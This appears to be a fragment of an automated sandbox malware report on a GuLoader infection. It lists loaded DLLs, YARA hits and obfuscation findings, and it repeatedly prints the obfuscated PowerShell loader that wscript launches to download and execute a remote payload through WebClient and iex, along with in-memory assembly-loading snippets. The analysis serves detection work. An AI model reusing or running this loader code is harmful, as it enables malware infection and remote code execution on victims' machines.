Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles Jump to behavior
Source: Binary string: .Core.pdb.s source: powershell.exe, 0000000A.00000002.2283297279.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2283297279.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nagement.Automation.pdb source: powershell.exe, 0000000A.00000002.2287976450.0000000008C96000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reser", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000A.00000002.2280052237.00000000063C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2282807652.0000000007520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2955442534.0000000003D44000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2288203195.00000000096F4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Egotripperne74)$global:Gemitorial = [System.Text.Encoding]::ASCII.GetString($Unlaborable)$global:Trskomageren=$Gemitorial.substring(303423,29428)<#Interregimental Sidegade Samlingsre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Kakaoen $Xylopia $Tilegnelsesevnes), (Blodtryks @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Subalterns23 = [AppDomain]::CurrentDomain.GetAssemblies()$g
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Butterworker224)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Adresseforskydningen, $false).DefineType(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Egotripperne74)$global:Gemitorial = [System.Text.Encoding]::ASCII.GetString($Unlaborable)$global:Trskomageren=$Gemitorial.substring(303423,29428)<#Interregimental Sidegade Samlingsre
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_07D708C2 push eax; mov dword ptr [esp], ecx 10_2_07D70AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21CB8 push esi; ret 10_2_08A21CC2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21C88 push ebp; ret 10_2_08A21C92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21C98 push edi; ret 10_2_08A21D02
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21CF8 push edi; ret 10_2_08A21D42
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21C68 push ebp; ret 10_2_08A21C72
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A21C4D push ebp; ret 10_2_08A21C62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A20D80 push cs; ret 10_2_08A20E66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A20EF0 push cs; ret 10_2_08A20EFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A2166A push 0000005Eh; iretd 10_2_08A21696
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A207B5 push es; ret 10_2_08A207BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A24325 pushfd ; ret 10_2_08A2432A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A20F10 push cs; ret 10_2_08A20F1E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_09632343 push 0000007Fh; retf 10_2_09632345
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_09634922 pushfd ; retf 10_2_09634929
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0963310F push ebp; ret 10_2_09633113
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0963438B push 0000007Dh; iretd 10_2_0963438D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_09630648 push edx; iretd 10_2_09630649
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_096348C3 pushfd ; ret 10_2_096348D1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_09633690 pushfd ; retf 10_2_09633691
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
